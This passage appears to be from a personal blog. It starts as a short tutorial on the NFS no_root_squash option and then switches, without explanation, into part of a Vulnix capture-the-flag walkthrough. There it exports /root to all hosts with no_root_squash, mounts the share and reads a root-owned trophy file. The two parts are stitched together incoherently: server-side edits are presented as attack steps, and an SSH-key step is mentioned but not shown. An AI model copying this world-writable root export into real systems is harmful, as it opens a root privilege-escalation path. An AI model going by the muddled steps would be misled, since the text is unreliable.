There are many options for NFS and I want to keep this article short but effective so I am leaving out many of the various configuration items that you could do. However there is one option that is worth mentioning, no_root_squash. By default NFS will downgrade any files created with the root permissions to the nobody user. This is a security feature that prevents privileges from being shared unless specifically requested.

If I create a file as the root user on the client on the NFS share, by default that file is owned by the nobody user.
```
 root@client:~# touch /shared/nfs1/file2 
 root@server:/nfs# ls -la file2
  -rw-r--r-- 1 nobody nogroup 0 Nov 18 18:06 file2
```
Sometimes it is important to share files that are owned as root with the proper permissions, in these cases this can be done by simply adding the no_root_squash attribute to the /etc/exports configuration.

Adding no_root_squash

Edit the /etc/exports file:
```
 root@server:/nfs# vi /etc/exports
```
Modify the /nfs line to:
```
 /nfs 192.168.0.195/32(rw,sync,no_root_squash)
```
In our case:
```
/root *(rw,no_root_squash)     * represents all
```
Now, let’s reboot our vm to get those changes to the Target Machine.
```
sudo mount -o vers=3 192.168.56.13:/root mnt
```
Now, we will use the previous concept that, we will generate a SSH key and try to login with it to get the root access.
```
sudo -i  

cd /home/researcher/vulhub/vulnix/mnt 

cat trophy.txt
```
This flag looks weird though lol..

That’s it.. Later if I get time, I will populate this post with other enumerations as well (full of rabbit holes but good to look into)..

it’s 23:58 and perfect time to all it a day 🙂
April 30, 2020